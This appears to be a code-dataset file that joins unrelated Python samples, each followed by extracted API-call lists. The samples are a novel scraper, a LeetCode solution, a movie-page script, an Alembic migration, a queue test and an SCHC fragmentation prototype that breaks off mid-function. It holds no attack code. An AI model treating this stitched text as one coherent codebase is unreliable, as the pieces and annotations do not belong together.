[((63, 138), 'mp_modbus_master.modbus_rtu_master', 'mmm.modbus_rtu_master', ([], {'uart_no': '(2)', 'parity': '(0)', 'tx_pin': '(12)', 'rx_pin': '(13)', 'en_pin': '(32)'}), '(uart_no=2, parity=0, tx_pin=12, rx_pin=13, en_pin=32)\n', (84, 138), True, 'import mp_modbus_master as mmm\n'), ((896, 909), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (906, 909), False, 'import time\n'), ((1521, 1536), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (1531, 1536), False, 'import time\n'), ((1194, 1221), 'struct.unpack', 'struct.unpack', (['""">h"""', 'f.data'], {}), "('>h', f.data)\n", (1207, 1221), False, 'import struct\n'), ((1391, 1418), 'struct.unpack', 'struct.unpack', (['""">I"""', 'f.data'], {}), "('>I', f.data)\n", (1404, 1418), False, 'import struct\n')]
|
import copy
import re
import requests
import urllib.parse
from bs4 import BeautifulSoup
from typing import List
try:
import basesite
except (ModuleNotFoundError, ImportError) as e:
from . import basesite
class SoxsSite(basesite.BaseSite):
def __init__(self):
self.site_info = basesite.SiteInfo(
type='网络小说',
statue='上线版本',
url='https://www.soxs.cc',
name='搜小说',
brief_name='搜小说',
version='1.1',
max_threading_number=50,
)
super().__init__(self.site_info)
self.base_url = 'https://www.soxs.cc'
self.encoding = 'utf-8'
self.search_url = 'https://www.soxs.cc/search.html'
self.session = requests.session()
@basesite.print_in_out
def get_books(self, search_info: str) -> List[basesite.Book]:
r = self.try_post_url(self.session, url=self.search_url, try_timeout=5,
params=f'searchtype=all&searchkey={urllib.parse.quote(search_info)}')
if r is None:
return []
soup = BeautifulSoup(r.content, 'html.parser')
book_tag_list = soup.select('div.novelslist2 > ul > li')
book_num = len(book_tag_list) - 1
if book_num == 0:
return []
search_book_results = []
book_soup_list = book_tag_list[1:]
for book_soup in book_soup_list:
span_list = book_soup.findAll('span')
book_url = self.base_url + span_list[1].find('a').attrs['href']
book_name = span_list[1].find('a').text
book_author = span_list[3].text
book_brief = f"最新章节:{span_list[2].find('a').text} 更新时间:{span_list[4].text.strip()}"
book = basesite.Book(site=self, url=book_url, name=book_name, author=book_author,
brief=book_brief)
search_book_results.append(book)
return search_book_results
@basesite.print_in_out
def get_chapters(self, book: basesite.Book) -> List[basesite.Chapter]:
r = self.try_get_url(self.session, book.url)
if r is None:
return []
soup = BeautifulSoup(r.content, 'html.parser')
chapter_soup_list = soup.select('div.caption + div dd a')
chapters = [basesite.Chapter(site=self,
url=self.base_url + chapter.attrs['href'],
title=chapter.text)
for chapter in chapter_soup_list]
return chapters
def get_chapter_content(self, chapter: basesite.Chapter) -> str:
session = copy.deepcopy(self.session)
r = self.try_get_url(session, chapter.url)
session.close()
if r is None:
return f'{chapter.title}\r\n下载失败'
soup = BeautifulSoup(r.content, 'html.parser')
content = soup.select_one('div.content').text
content2 = re.sub(r"您可以在百度.+查找最新章节!", "", content)
if m := re.search(r"\w+最新章节地址:https://www.soxs.cc", content2):
content2 = content2[:m.start()].strip()
# title = chapter.title if chapter.title.startswith("第") else f"第{chapter.title}"
# content3 = f'\r\n{title}\r\n{content2.strip()}'
return content2
def save_chapter(self, chapter, filename):
content = self.get_chapter_content(chapter)
with open(filename, 'w', encoding=self.encoding) as f:
f.write(content)
|
[
"requests.session",
"copy.deepcopy",
"basesite.Chapter",
"basesite.Book",
"re.search",
"bs4.BeautifulSoup",
"re.sub",
"basesite.SiteInfo"
] |
[((300, 446), 'basesite.SiteInfo', 'basesite.SiteInfo', ([], {'type': '"""网络小说"""', 'statue': '"""上线版本"""', 'url': '"""https://www.soxs.cc"""', 'name': '"""搜小说"""', 'brief_name': '"""搜小说"""', 'version': '"""1.1"""', 'max_threading_number': '(50)'}), "(type='网络小说', statue='上线版本', url='https://www.soxs.cc',\n name='搜小说', brief_name='搜小说', version='1.1', max_threading_number=50)\n", (317, 446), False, 'import basesite\n'), ((740, 758), 'requests.session', 'requests.session', ([], {}), '()\n', (756, 758), False, 'import requests\n'), ((1093, 1132), 'bs4.BeautifulSoup', 'BeautifulSoup', (['r.content', '"""html.parser"""'], {}), "(r.content, 'html.parser')\n", (1106, 1132), False, 'from bs4 import BeautifulSoup\n'), ((2165, 2204), 'bs4.BeautifulSoup', 'BeautifulSoup', (['r.content', '"""html.parser"""'], {}), "(r.content, 'html.parser')\n", (2178, 2204), False, 'from bs4 import BeautifulSoup\n'), ((2623, 2650), 'copy.deepcopy', 'copy.deepcopy', (['self.session'], {}), '(self.session)\n', (2636, 2650), False, 'import copy\n'), ((2810, 2849), 'bs4.BeautifulSoup', 'BeautifulSoup', (['r.content', '"""html.parser"""'], {}), "(r.content, 'html.parser')\n", (2823, 2849), False, 'from bs4 import BeautifulSoup\n'), ((2923, 2961), 're.sub', 're.sub', (['"""您可以在百度.+查找最新章节!"""', '""""""', 'content'], {}), "('您可以在百度.+查找最新章节!', '', content)\n", (2929, 2961), False, 'import re\n'), ((1743, 1839), 'basesite.Book', 'basesite.Book', ([], {'site': 'self', 'url': 'book_url', 'name': 'book_name', 'author': 'book_author', 'brief': 'book_brief'}), '(site=self, url=book_url, name=book_name, author=book_author,\n brief=book_brief)\n', (1756, 1839), False, 'import basesite\n'), ((2292, 2386), 'basesite.Chapter', 'basesite.Chapter', ([], {'site': 'self', 'url': "(self.base_url + chapter.attrs['href'])", 'title': 'chapter.text'}), "(site=self, url=self.base_url + chapter.attrs['href'],\n title=chapter.text)\n", (2308, 2386), False, 'import basesite\n'), ((2979, 3032), 're.search', 're.search', (['"""\\\\w+最新章节地址:https://www.soxs.cc"""', 'content2'], {}), "('\\\\w+最新章节地址:https://www.soxs.cc', content2)\n", (2988, 3032), False, 'import re\n')]
|
# You are given an integer array sorted in ascending order (may contain duplicates), you need to split them into several subsequences, where each subsequences consist of at least 3 consecutive integers. Return whether you can make such a split.
#
# Example 1:
# Input: [1,2,3,3,4,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3
# 3, 4, 5
# Example 2:
# Input: [1,2,3,3,4,4,5,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3, 4, 5
# 3, 4, 5
# Example 3:
# Input: [1,2,3,4,4,5]
# Output: False
# Note:
# The length of the input is in range of [1, 10000]
import collections
class Solution(object):
def isPossible(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
count = collections.Counter(nums)
tails = collections.Counter()
for x in nums:
if count[x] == 0:
continue
elif tails[x] > 0:
tails[x] -= 1
tails[x + 1] += 1
elif count[x + 1] > 0 and count[x + 2] > 0:
count[x + 1] -= 1
count[x + 2] -= 1
tails[x + 3] += 1
else:
return False
count[x] -= 1
return True
s=Solution()
s.isPossible([1,2,3,3,4,4,5,5])
|
[
"collections.Counter"
] |
[((823, 848), 'collections.Counter', 'collections.Counter', (['nums'], {}), '(nums)\n', (842, 848), False, 'import collections\n'), ((865, 886), 'collections.Counter', 'collections.Counter', ([], {}), '()\n', (884, 886), False, 'import collections\n')]
|
# website.py
# Created by: <NAME>
# Date: 5 June 2015
# Purpouse: This file is for instantiating all the movie objects and then
# call display_page.py to render the movies in an html page
import display_page
import movie
# Creating objects for my favourite movie
cars = movie.Movie(
"Cars",
"Story about live cars",
"2006",
"Pixar Animation Studios",
"Walt Disney Pictures",
"<NAME>",
"Golden Globe Award for Best Animated Feature Film",
"https://upload.wikimedia.org/wikipedia/en/3/34/Cars_2006.jpg",
"https://www.youtube.com/watch?v=WGByijP0Leo"
)
ratatouille = movie.Movie(
"Ratatouille",
"Anybody can cook",
"2007",
"Pixar Animation Studios",
"Walt Disney Pictures",
"<NAME>",
"Academy Award for Best Animated Feature",
"https://upload.wikimedia.org/wikipedia/en/5/50/RatatouillePoster.jpg",
"https://www.youtube.com/watch?v=c3sBBRxDAqk"
)
tangled = movie.Movie(
"Tangled",
"Girl with long golden red hairs",
"2010",
"Walt Disney Animation Studios",
"Walt Disney Pictures",
"<NAME> & <NAME>",
"Best Original Song at the 83rd Academy Awards",
"https://upload.wikimedia.org/wikipedia/en/a/a8/Tangled_poster.jpg",
"https://www.youtube.com/watch?v=pyOyBVXDJ9Q"
)
brave = movie.Movie(
"Brave",
"Girl with lot of courage",
"2012",
"Pixar Animation Studios",
"Walt Disney Pictures",
"Mark Andrews and <NAME>",
"Academy Award,the Golden Globe,and the BAFTA Award for Best \
Animated Feature Film.",
"https://upload.wikimedia.org/wikipedia/en/9/96/Brave_Poster.jpg",
"https://www.youtube.com/watch?v=6CKcqIahedc"
)
# Create an arrary of all my favourite movies
movies_list = [cars, ratatouille, tangled, brave]
# Call another python script to render the movies on an html page
display_page.open_movies_page(movies_list)
# EOF
|
[
"display_page.open_movies_page",
"movie.Movie"
] |
[((282, 575), 'movie.Movie', 'movie.Movie', (['"""Cars"""', '"""Story about live cars"""', '"""2006"""', '"""Pixar Animation Studios"""', '"""Walt Disney Pictures"""', '"""<NAME>"""', '"""Golden Globe Award for Best Animated Feature Film"""', '"""https://upload.wikimedia.org/wikipedia/en/3/34/Cars_2006.jpg"""', '"""https://www.youtube.com/watch?v=WGByijP0Leo"""'], {}), "('Cars', 'Story about live cars', '2006',\n 'Pixar Animation Studios', 'Walt Disney Pictures', '<NAME>',\n 'Golden Globe Award for Best Animated Feature Film',\n 'https://upload.wikimedia.org/wikipedia/en/3/34/Cars_2006.jpg',\n 'https://www.youtube.com/watch?v=WGByijP0Leo')\n", (293, 575), False, 'import movie\n'), ((627, 920), 'movie.Movie', 'movie.Movie', (['"""Ratatouille"""', '"""Anybody can cook"""', '"""2007"""', '"""Pixar Animation Studios"""', '"""Walt Disney Pictures"""', '"""<NAME>"""', '"""Academy Award for Best Animated Feature"""', '"""https://upload.wikimedia.org/wikipedia/en/5/50/RatatouillePoster.jpg"""', '"""https://www.youtube.com/watch?v=c3sBBRxDAqk"""'], {}), "('Ratatouille', 'Anybody can cook', '2007',\n 'Pixar Animation Studios', 'Walt Disney Pictures', '<NAME>',\n 'Academy Award for Best Animated Feature',\n 'https://upload.wikimedia.org/wikipedia/en/5/50/RatatouillePoster.jpg',\n 'https://www.youtube.com/watch?v=c3sBBRxDAqk')\n", (638, 920), False, 'import movie\n'), ((968, 1290), 'movie.Movie', 'movie.Movie', (['"""Tangled"""', '"""Girl with long golden red hairs"""', '"""2010"""', '"""Walt Disney Animation Studios"""', '"""Walt Disney Pictures"""', '"""<NAME> & <NAME>"""', '"""Best Original Song at the 83rd Academy Awards"""', '"""https://upload.wikimedia.org/wikipedia/en/a/a8/Tangled_poster.jpg"""', '"""https://www.youtube.com/watch?v=pyOyBVXDJ9Q"""'], {}), "('Tangled', 'Girl with long golden red hairs', '2010',\n 'Walt Disney Animation Studios', 'Walt Disney Pictures',\n '<NAME> & <NAME>', 'Best Original Song at the 83rd Academy Awards',\n 'https://upload.wikimedia.org/wikipedia/en/a/a8/Tangled_poster.jpg',\n 'https://www.youtube.com/watch?v=pyOyBVXDJ9Q')\n", (979, 1290), False, 'import movie\n'), ((1336, 1695), 'movie.Movie', 'movie.Movie', (['"""Brave"""', '"""Girl with lot of courage"""', '"""2012"""', '"""Pixar Animation Studios"""', '"""Walt Disney Pictures"""', '"""Mark Andrews and <NAME>"""', '"""Academy Award,the Golden Globe,and the BAFTA Award for Best Animated Feature Film."""', '"""https://upload.wikimedia.org/wikipedia/en/9/96/Brave_Poster.jpg"""', '"""https://www.youtube.com/watch?v=6CKcqIahedc"""'], {}), "('Brave', 'Girl with lot of courage', '2012',\n 'Pixar Animation Studios', 'Walt Disney Pictures',\n 'Mark Andrews and <NAME>',\n 'Academy Award,the Golden Globe,and the BAFTA Award for Best Animated Feature Film.'\n , 'https://upload.wikimedia.org/wikipedia/en/9/96/Brave_Poster.jpg',\n 'https://www.youtube.com/watch?v=6CKcqIahedc')\n", (1347, 1695), False, 'import movie\n'), ((1896, 1938), 'display_page.open_movies_page', 'display_page.open_movies_page', (['movies_list'], {}), '(movies_list)\n', (1925, 1938), False, 'import display_page\n')]
|
"""add Tutor and Moderator
Revision ID: 12b0e8390634
Revises: <PASSWORD>
Create Date: 2020-01-12 12:41:22.787337
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '12b0e8390634'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('moderator',
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('course_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['course_id'], ['course.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('user_id', 'course_id')
)
op.create_table('tutor',
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('course_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['course_id'], ['course.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('user_id', 'course_id')
)
op.add_column('answer', sa.Column('homework_id', sa.Integer(), nullable=True))
op.add_column('answer', sa.Column('user_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'answer', 'user', ['user_id'], ['id'])
op.create_foreign_key(None, 'answer', 'homework', ['homework_id'], ['id'])
op.add_column('student', sa.Column('entry_year', sa.Integer(), nullable=True))
op.add_column('student', sa.Column('user_id', sa.Integer(), nullable=False))
op.drop_constraint('student_id_fkey', 'student', type_='foreignkey')
op.create_foreign_key(None, 'student', 'user', ['user_id'], ['id'])
op.drop_column('student', 'id')
op.add_column('user', sa.Column('about_me', sa.String(), nullable=True))
op.add_column('user', sa.Column('city', sa.String(), nullable=True))
op.add_column('user', sa.Column('facebook_link', sa.String(), nullable=True))
op.add_column('user', sa.Column('instagram_link', sa.String(), nullable=True))
op.add_column('user', sa.Column('is_moderator', sa.Boolean(), nullable=True))
op.add_column('user', sa.Column('is_tutor', sa.Boolean(), nullable=True))
op.add_column('user', sa.Column('linkedin_link', sa.String(), nullable=True))
op.add_column('user', sa.Column('middle_name', sa.String(), nullable=True))
op.add_column('user', sa.Column('password_hash', sa.String(), nullable=True))
op.add_column('user', sa.Column('vk_link', sa.String(), nullable=True))
op.drop_column('user', 'status')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('user', sa.Column('status', sa.VARCHAR(), autoincrement=False, nullable=True))
op.drop_column('user', 'vk_link')
op.drop_column('user', 'password_hash')
op.drop_column('user', 'middle_name')
op.drop_column('user', 'linkedin_link')
op.drop_column('user', 'is_tutor')
op.drop_column('user', 'is_moderator')
op.drop_column('user', 'instagram_link')
op.drop_column('user', 'facebook_link')
op.drop_column('user', 'city')
op.drop_column('user', 'about_me')
op.add_column('student', sa.Column('id', sa.INTEGER(), autoincrement=False, nullable=False))
op.drop_constraint(None, 'student', type_='foreignkey')
op.create_foreign_key('student_id_fkey', 'student', 'user', ['id'], ['id'])
op.drop_column('student', 'user_id')
op.drop_column('student', 'entry_year')
op.drop_constraint(None, 'answer', type_='foreignkey')
op.drop_constraint(None, 'answer', type_='foreignkey')
op.drop_column('answer', 'user_id')
op.drop_column('answer', 'homework_id')
op.drop_table('tutor')
op.drop_table('moderator')
# ### end Alembic commands ###
|
[
"alembic.op.drop_table",
"sqlalchemy.VARCHAR",
"sqlalchemy.INTEGER",
"alembic.op.create_foreign_key",
"sqlalchemy.PrimaryKeyConstraint",
"alembic.op.drop_constraint",
"alembic.op.drop_column",
"sqlalchemy.Boolean",
"sqlalchemy.ForeignKeyConstraint",
"sqlalchemy.String",
"sqlalchemy.Integer"
] |
[((1385, 1451), 'alembic.op.create_foreign_key', 'op.create_foreign_key', (['None', '"""answer"""', '"""user"""', "['user_id']", "['id']"], {}), "(None, 'answer', 'user', ['user_id'], ['id'])\n", (1406, 1451), False, 'from alembic import op\n'), ((1456, 1530), 'alembic.op.create_foreign_key', 'op.create_foreign_key', (['None', '"""answer"""', '"""homework"""', "['homework_id']", "['id']"], {}), "(None, 'answer', 'homework', ['homework_id'], ['id'])\n", (1477, 1530), False, 'from alembic import op\n'), ((1699, 1767), 'alembic.op.drop_constraint', 'op.drop_constraint', (['"""student_id_fkey"""', '"""student"""'], {'type_': '"""foreignkey"""'}), "('student_id_fkey', 'student', type_='foreignkey')\n", (1717, 1767), False, 'from alembic import op\n'), ((1772, 1839), 'alembic.op.create_foreign_key', 'op.create_foreign_key', (['None', '"""student"""', '"""user"""', "['user_id']", "['id']"], {}), "(None, 'student', 'user', ['user_id'], ['id'])\n", (1793, 1839), False, 'from alembic import op\n'), ((1844, 1875), 'alembic.op.drop_column', 'op.drop_column', (['"""student"""', '"""id"""'], {}), "('student', 'id')\n", (1858, 1875), False, 'from alembic import op\n'), ((2675, 2707), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""status"""'], {}), "('user', 'status')\n", (2689, 2707), False, 'from alembic import op\n'), ((2929, 2962), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""vk_link"""'], {}), "('user', 'vk_link')\n", (2943, 2962), False, 'from alembic import op\n'), ((2967, 3006), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""password_hash"""'], {}), "('user', 'password_hash')\n", (2981, 3006), False, 'from alembic import op\n'), ((3011, 3048), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""middle_name"""'], {}), "('user', 'middle_name')\n", (3025, 3048), False, 'from alembic import op\n'), ((3053, 3092), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""linkedin_link"""'], {}), "('user', 'linkedin_link')\n", (3067, 3092), False, 'from alembic import op\n'), ((3097, 3131), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""is_tutor"""'], {}), "('user', 'is_tutor')\n", (3111, 3131), False, 'from alembic import op\n'), ((3136, 3174), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""is_moderator"""'], {}), "('user', 'is_moderator')\n", (3150, 3174), False, 'from alembic import op\n'), ((3179, 3219), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""instagram_link"""'], {}), "('user', 'instagram_link')\n", (3193, 3219), False, 'from alembic import op\n'), ((3224, 3263), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""facebook_link"""'], {}), "('user', 'facebook_link')\n", (3238, 3263), False, 'from alembic import op\n'), ((3268, 3298), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""city"""'], {}), "('user', 'city')\n", (3282, 3298), False, 'from alembic import op\n'), ((3303, 3337), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""about_me"""'], {}), "('user', 'about_me')\n", (3317, 3337), False, 'from alembic import op\n'), ((3439, 3494), 'alembic.op.drop_constraint', 'op.drop_constraint', (['None', '"""student"""'], {'type_': '"""foreignkey"""'}), "(None, 'student', type_='foreignkey')\n", (3457, 3494), False, 'from alembic import op\n'), ((3499, 3574), 'alembic.op.create_foreign_key', 'op.create_foreign_key', (['"""student_id_fkey"""', '"""student"""', '"""user"""', "['id']", "['id']"], {}), "('student_id_fkey', 'student', 'user', ['id'], ['id'])\n", (3520, 3574), False, 'from alembic import op\n'), ((3579, 3615), 'alembic.op.drop_column', 'op.drop_column', (['"""student"""', '"""user_id"""'], {}), "('student', 'user_id')\n", (3593, 3615), False, 'from alembic import op\n'), ((3620, 3659), 'alembic.op.drop_column', 'op.drop_column', (['"""student"""', '"""entry_year"""'], {}), "('student', 'entry_year')\n", (3634, 3659), False, 'from alembic import op\n'), ((3664, 3718), 'alembic.op.drop_constraint', 'op.drop_constraint', (['None', '"""answer"""'], {'type_': '"""foreignkey"""'}), "(None, 'answer', type_='foreignkey')\n", (3682, 3718), False, 'from alembic import op\n'), ((3723, 3777), 'alembic.op.drop_constraint', 'op.drop_constraint', (['None', '"""answer"""'], {'type_': '"""foreignkey"""'}), "(None, 'answer', type_='foreignkey')\n", (3741, 3777), False, 'from alembic import op\n'), ((3782, 3817), 'alembic.op.drop_column', 'op.drop_column', (['"""answer"""', '"""user_id"""'], {}), "('answer', 'user_id')\n", (3796, 3817), False, 'from alembic import op\n'), ((3822, 3861), 'alembic.op.drop_column', 'op.drop_column', (['"""answer"""', '"""homework_id"""'], {}), "('answer', 'homework_id')\n", (3836, 3861), False, 'from alembic import op\n'), ((3866, 3888), 'alembic.op.drop_table', 'op.drop_table', (['"""tutor"""'], {}), "('tutor')\n", (3879, 3888), False, 'from alembic import op\n'), ((3893, 3919), 'alembic.op.drop_table', 'op.drop_table', (['"""moderator"""'], {}), "('moderator')\n", (3906, 3919), False, 'from alembic import op\n'), ((584, 637), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['course_id']", "['course.id']"], {}), "(['course_id'], ['course.id'])\n", (607, 637), True, 'import sqlalchemy as sa\n'), ((661, 710), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['user_id']", "['user.id']"], {}), "(['user_id'], ['user.id'])\n", (684, 710), True, 'import sqlalchemy as sa\n'), ((734, 781), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""user_id"""', '"""course_id"""'], {}), "('user_id', 'course_id')\n", (757, 781), True, 'import sqlalchemy as sa\n'), ((999, 1052), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['course_id']", "['course.id']"], {}), "(['course_id'], ['course.id'])\n", (1022, 1052), True, 'import sqlalchemy as sa\n'), ((1076, 1125), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['user_id']", "['user.id']"], {}), "(['user_id'], ['user.id'])\n", (1099, 1125), True, 'import sqlalchemy as sa\n'), ((1149, 1196), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""user_id"""', '"""course_id"""'], {}), "('user_id', 'course_id')\n", (1172, 1196), True, 'import sqlalchemy as sa\n'), ((459, 471), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (469, 471), True, 'import sqlalchemy as sa\n'), ((533, 545), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (543, 545), True, 'import sqlalchemy as sa\n'), ((874, 886), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (884, 886), True, 'import sqlalchemy as sa\n'), ((948, 960), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (958, 960), True, 'import sqlalchemy as sa\n'), ((1272, 1284), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1282, 1284), True, 'import sqlalchemy as sa\n'), ((1351, 1363), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1361, 1363), True, 'import sqlalchemy as sa\n'), ((1584, 1596), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1594, 1596), True, 'import sqlalchemy as sa\n'), ((1664, 1676), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1674, 1676), True, 'import sqlalchemy as sa\n'), ((1924, 1935), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (1933, 1935), True, 'import sqlalchemy as sa\n'), ((1997, 2008), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2006, 2008), True, 'import sqlalchemy as sa\n'), ((2079, 2090), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2088, 2090), True, 'import sqlalchemy as sa\n'), ((2162, 2173), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2171, 2173), True, 'import sqlalchemy as sa\n'), ((2243, 2255), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (2253, 2255), True, 'import sqlalchemy as sa\n'), ((2321, 2333), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (2331, 2333), True, 'import sqlalchemy as sa\n'), ((2404, 2415), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2413, 2415), True, 'import sqlalchemy as sa\n'), ((2484, 2495), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2493, 2495), True, 'import sqlalchemy as sa\n'), ((2566, 2577), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2575, 2577), True, 'import sqlalchemy as sa\n'), ((2642, 2653), 'sqlalchemy.String', 'sa.String', ([], {}), '()\n', (2651, 2653), True, 'import sqlalchemy as sa\n'), ((2874, 2886), 'sqlalchemy.VARCHAR', 'sa.VARCHAR', ([], {}), '()\n', (2884, 2886), True, 'import sqlalchemy as sa\n'), ((3383, 3395), 'sqlalchemy.INTEGER', 'sa.INTEGER', ([], {}), '()\n', (3393, 3395), True, 'import sqlalchemy as sa\n')]
|
# -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/8/8 0008 14:57
import time
from test_frame.best_simple_example.test_consume import consumer
consumer.publisher_of_same_queue.clear()
# 这里的publisher_of_same_queue 也可以使用get_publisher函数得到发布者,但需要手动确保消费者的队列名字与发布者的队列名字一致,并且中间件种类一致。用法如下。
# pb = get_publisher('queue_test2',broker_kind=6)
# pb.publish({'a': i, 'b': 2 * i})
# [consumer.publisher_of_same_queue.publish({'a': i, 'b': 2 * i}) for i in range(100)]
for i in range(10000):
time.sleep(0.05)
consumer.publisher_of_same_queue.publish({'a': i, 'b': 2 * i})
|
[
"time.sleep",
"test_frame.best_simple_example.test_consume.consumer.publisher_of_same_queue.publish",
"test_frame.best_simple_example.test_consume.consumer.publisher_of_same_queue.clear"
] |
[((153, 193), 'test_frame.best_simple_example.test_consume.consumer.publisher_of_same_queue.clear', 'consumer.publisher_of_same_queue.clear', ([], {}), '()\n', (191, 193), False, 'from test_frame.best_simple_example.test_consume import consumer\n'), ((495, 511), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (505, 511), False, 'import time\n'), ((516, 578), 'test_frame.best_simple_example.test_consume.consumer.publisher_of_same_queue.publish', 'consumer.publisher_of_same_queue.publish', (["{'a': i, 'b': 2 * i}"], {}), "({'a': i, 'b': 2 * i})\n", (556, 578), False, 'from test_frame.best_simple_example.test_consume import consumer\n')]
|
#---------------------------------------------------------------------------
import warnings
import struct
import sys
sys.path.append("../../PLIDO-tanupoo")
import fragment
#import schc_fragment as fragment
sys.path.append("../python")
import BitBuffer as BitBufferModule
#---------------------------------------------------------------------------
class BitBuffer_XXX(BitBufferModule.BitBuffer):
#XXX debug and put in BitBuffer.py
def __init__(self, *args, **kwargs):
BitBufferModule.BitBuffer.__init__(self, *args, **kwargs)
def add_bits(self, bits_as_long_int, nb_bits):
for i in range(nb_bits, -1, -1):
self.add_bit(bits_as_long_int & (1 << i))
pop_bit = BitBufferModule.BitBuffer.next_bit
def pop_bits(self, nb_bits):
result = 0
for i in range(nb_bits, -1, -1):
if self.pop_bit():
result |= (1<<i)
def pop_byte(self):
return self.pop_bits(8)
def pop_bytes(self, nb_bytes):
return bytearray([self.pop_byte() for i in range(nb_bytes)])
def get_content(self):
return self._buf[:]
class FakeBitBuffer:
def __init__(self, content = []):
self.content = content[:]
def add_bits(self, bits_as_long, nb_bits):
self.content.append((bits_as_long, nb_bits))
def get_bits(self, nb_bits):
bits_as_long, added_nb_bits = self.content.pop(0)
assert nb_bits == added_nb_bits
return bits_as_long
def get_content(self):
return self.content[:]
def test_BitBuffer():
bitbuffer = FakeBitBuffer()
bitbuffer.add_bits(0xf, 4)
bitbuffer.add_bits(0, 2)
bitbuffer.add_bits(0x1, 2)
for i in range(3):
bitbuffer.add_bits(0, 1)
bitbuffer.add_bits(0x1, 1)
bitbuffer.add_bits(0x3, 2)
print(bitbuffer.get_content())
#print([bin(x) for x in bitbuffer.get_content])
#test_BitBuffer(); exit_now()
#---------------------------------------------------------------------------
RELIABILITY_OPTION_LIST = ["no-ack", "window", "ack-on-error"]
class SchcFragmentFormat:
def __init__(self, R, T, N, M, mode="window"):
if mode not in RELIABILITY_OPTION_LIST:
raise ValueError("unknown reliability option", mode)
self.R = R
self.T = T
self.N = N
self.M = M
self.mode = mode
if self.mode == "no-ack":
self.window_field_bitsize = 0
else: self.window_field_bitsize = 1
# 880 fragments format this field has a size of R - T - N - 1 bits when
# 881 Window mode is used. In No ACK mode, the Rule ID field has a size of
# 882 R - T - N bits see format section.
self.rule_id_bitsize = (self.R - self.T - self.N
- self.window_field_bitsize)
assert self.rule_id_bitsize >= 0
assert self.N >= 1
assert self.mode == "window" # XXX in this version of the code
def get_all_0(self):
return 0
def get_all_1(self):
return 2**self.N - 1
def get_fcn_max(self):
"""maximum value of the FCN, itself included"""
self.fcn_max = 2**self.N - 2
def pack_fragment(self, rule_id, dtag, window_index, advertized_fcn,
payload, mic = b""):
# 1013 <------------ R ---------->
# 1014 <--T--> 1 <--N-->
# 1015 +-- ... --+- ... -+-+- ... -+---...---+
# 1016 | Rule ID | DTag |W| FCN | payload |
# 1017 +-- ... --+- ... -+-+- ... -+---...---+
#
# and
#
# 1105 <------------ R ------------>
# 1106 <- T -> 1 <- N -> <---- M ----->
# 1107 +-- ... --+- ... -+-+- ... -+---- ... ----+---...---+
# 1108 | Rule ID | DTag |W| 11..1 | MIC | payload |
# 1109 +-- ... --+- ... -+-+- ... -+---- ... ----+---...---+
bit_buffer = FakeBitBuffer()
bit_buffer.add_bits(rule_id, self.rule_id_bitsize)
bit_buffer.add_bits(dtag, self.T)
bit_buffer.add_bits(window_index%2, 1)
bit_buffer.add_bits(advertized_fcn, self.N)
assert ( (len(mic) == 0 and advertized_fcn != self.get_all_1())
or (len(mic) != 0 and advertized_fcn == self.get_all_1()))
if len(mic) > 0:
bit_buffer.add_bits(mic, self.M)
bit_buffer.add_bits(payload, 8*len(payload))
return bit_buffer.get_content()
def pack_empty_fragment(self, advertized_fcn):
# 1083 <------------ R ------------>
# 1084 <- T -> 1 <- N ->
